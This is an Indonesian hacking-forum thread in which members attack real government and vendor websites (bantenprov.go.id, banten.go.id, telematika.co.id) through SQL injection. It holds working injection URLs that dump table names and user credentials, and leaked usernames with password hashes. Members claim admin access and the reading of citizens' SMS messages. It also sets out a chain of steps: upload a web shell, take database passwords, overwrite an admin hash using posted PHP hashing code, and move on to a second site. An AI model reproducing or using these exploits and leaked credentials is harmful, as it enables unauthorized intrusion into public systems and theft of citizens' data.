hole di http://bantenprov.go.id/ untuk sqli
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: hole di http://bantenprov.go.id/ untuk sqli
Mhn maaf sebelumnya, Usahakan klo bisa hilangkan kebiasaan OOT yg gak perlu, karena akan menurunkan kualitas diskusi kita...
Jika belum bisa memberikan komentar berupa jawaban, alangkah lebih baik jika melontarkan pertanyaan saja, sehingga diskusi bisa menjadi lebih berkembang...
Sekali lagi mohon maaf yg sedalam2nya...
Jika belum bisa memberikan komentar berupa jawaban, alangkah lebih baik jika melontarkan pertanyaan saja, sehingga diskusi bisa menjadi lebih berkembang...
Sekali lagi mohon maaf yg sedalam2nya...
...n0 l1m17...
Re: hole di http://bantenprov.go.id/ untuk sqli
berita dan semua data bisa dimanipulasi
Hore... bisa baca sms masyarakat..
Informasi user,hak akses dan bagian data yang bisa diakses
Udah dapat user adminnya
ID = godmode
pass = *********** (sensor hehehhee)
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
-
- Posts: 145
- Joined: Wed Apr 07, 2010 8:55 pm
Re: hole di http://bantenprov.go.id/ untuk sqli
iseng2 ngoprek situ pembuat bantenprov.go.id yaitu www.telematika.co.id, eh ada bug sqlinya juga, ini bugnya :
ini tablenya :
ini isi dari table pengguna :
username dan password adminnya :
halaman loginnya
sya ada pertanyaan neh untuk master2 yg sudah mahir dalam sqli, ini pertanyaannya :
saya sudah berhasil mengcrack password dari username admin, namun ketika saya masukkan username dan password ke dalam kolom login ternyata tidak bisa, kira2 itu masalahnya apa ya ? mohon bantuannya
:putusasa: :putusasa: :putusasa:
Code: Select all
http://www.telematika.co.id/?link=dtl&id=54'
Code: Select all
http://www.telematika.co.id/?link=dtl&id=-54%20union%20select%20all%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Code: Select all
http://www.telematika.co.id/?link=dtl&id=-54%20union%20select%20all%201,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20information_schema.columns%20where%20table_name=0x70656e6767756e61%20%20--
Code: Select all
http://www.telematika.co.id/?link=dtl&id=-54%20union%20select%20all%201,2,3,4,group_concat%28user_name,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20pengguna
Code: Select all
sisyanto:3bef59a71875f84eb03b6d12c82d7e4c
dzarmono:cedba12e0b1d86be3628f72bbf257ef3
admin:ac43724f16e9241d990427ab7c8f4228
Code: Select all
http://www.telematika.co.id/admin/
saya sudah berhasil mengcrack password dari username admin, namun ketika saya masukkan username dan password ke dalam kolom login ternyata tidak bisa, kira2 itu masalahnya apa ya ? mohon bantuannya
:putusasa: :putusasa: :putusasa:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
-
- Posts: 145
- Joined: Wed Apr 07, 2010 8:55 pm
Re: hole di http://bantenprov.go.id/ untuk sqli
@om poni : mantab om, kalau boleh tau om ngecrack hasnya pake apaan ya ?
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: hole di http://bantenprov.go.id/ untuk sqli
kemungkinannya ada 2 :cyber_criminal wrote: sya ada pertanyaan neh untuk master2 yg sudah mahir dalam sqli, ini pertanyaannya :
saya sudah berhasil mengcrack password dari username admin, namun ketika saya masukkan username dan password ke dalam kolom login ternyata tidak bisa, kira2 itu masalahnya apa ya ? mohon bantuannya
:putusasa: :putusasa: :putusasa:
1. data user dan pass bukan pada tabel yg benar, kadang pengelola sengaja membuat tabel tipuan, solusinya harus ngecek tabelnya satu-persatu...
2. Halaman Login belum benar, kadang juga pengelola membuat halaman admin tipuan, solusinya coba cari halaman yg lain...
...n0 l1m17...
Re: hole di http://bantenprov.go.id/ untuk sqli
cyber_criminal : coba cari tabel lainnya. klo di tabel 'Pengguna' passwordnya udah di salt. ada satu tabel yang berisi admin login dan hanya di enkrip dgn md5 tanpa salt. gue jg mau ralat bahwa tadi gue coba ternyata ID godmode hanya sebatas super user. ga bisa modifikasi isi web sebebas bebasnya. hanya beberapa konten yang memperbolehkan ID godmode menambah/modifikasi isi web.
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
-
- Posts: 145
- Joined: Wed Apr 07, 2010 8:55 pm
Re: hole di http://bantenprov.go.id/ untuk sqli
makasih om poni dan om 3xtr3m3boy atas pencerahannya, saya akan berusaha mencari lebih dalam lagi.
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: hole di http://bantenprov.go.id/ untuk sqli
wew. POC nya pak. login pake id apa kesana?3xtr3m3b0y wrote:http://www.bantenprov.go.id/dl/.3xtr3m3b0y.txt
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: hole di http://bantenprov.go.id/ untuk sqli
Sy cuma melanjutkan apa yg sdh dikerjakan oleh Om Poni koq, kira2 begini Algoritmanya:
1. Login ke site admin www.banten.go.id
2. Upload WebShell
3. Cari file PHP utk koneksi ke database, utk memperoleh User & Pass Database
4. Koneksi ke database MySQL
5. Ganti Hash Password salah satu User pada tabel pengguna
6. Login ke www.bantenprov.go.id
7. Upload WebShell
8. Masih bisa dilanjutkan ke ROOTING, tp cukuplah smp langkah ke 7 sj
NB:
1. Pada langkah nomor 3, ternyata www.banten.go.id terkoneksi ke MySQL Server pada mesin www.bantenprov.go.id. Jadi jika dilakukan perubahan pada database, maka akan berefek pada kedua website tsb.
2. Pada langkah nomer 5, sy mengambil potongan2 file yg fungsinya utk melakukan proses Hashing, dari hal tsb sy dapat menghasilkan Hash Password yg sy sdh ketahui Plain Text-nya.
Berikut potongan skripnya :
Mhn maaf kalo bahasanya kacau, moga bisa sedikit dipahami :maaf:
PS: Buat XCoders dan Pengelola Website, ini semata2 utk tujuan pembelajaran, tidak sama sekali utk melakukan pengrusakan, moga dapat diambil pelajaran bagi kita semua...
1. Login ke site admin www.banten.go.id
2. Upload WebShell
3. Cari file PHP utk koneksi ke database, utk memperoleh User & Pass Database
4. Koneksi ke database MySQL
5. Ganti Hash Password salah satu User pada tabel pengguna
6. Login ke www.bantenprov.go.id
7. Upload WebShell
8. Masih bisa dilanjutkan ke ROOTING, tp cukuplah smp langkah ke 7 sj
NB:
1. Pada langkah nomor 3, ternyata www.banten.go.id terkoneksi ke MySQL Server pada mesin www.bantenprov.go.id. Jadi jika dilakukan perubahan pada database, maka akan berefek pada kedua website tsb.
2. Pada langkah nomer 5, sy mengambil potongan2 file yg fungsinya utk melakukan proses Hashing, dari hal tsb sy dapat menghasilkan Hash Password yg sy sdh ketahui Plain Text-nya.
Berikut potongan skripnya :
Code: Select all
<?
function md5_base64($data)
{
return preg_replace('/=+$/','',base64_encode(pack('H*',md5($data))));
}
function kript($data)
{ $k = "I had a butterfly in my stomache";
$krip = sha1(md5_base64($data));
return $krip;
}
$TxtPasswd = 'password'; //Masukkan Plain Text Password Anda
$val = kript($TxtPasswd);
$md5_passwd = md5($val);
print $md5_passwd;
?>
PS: Buat XCoders dan Pengelola Website, ini semata2 utk tujuan pembelajaran, tidak sama sekali utk melakukan pengrusakan, moga dapat diambil pelajaran bagi kita semua...
...n0 l1m17...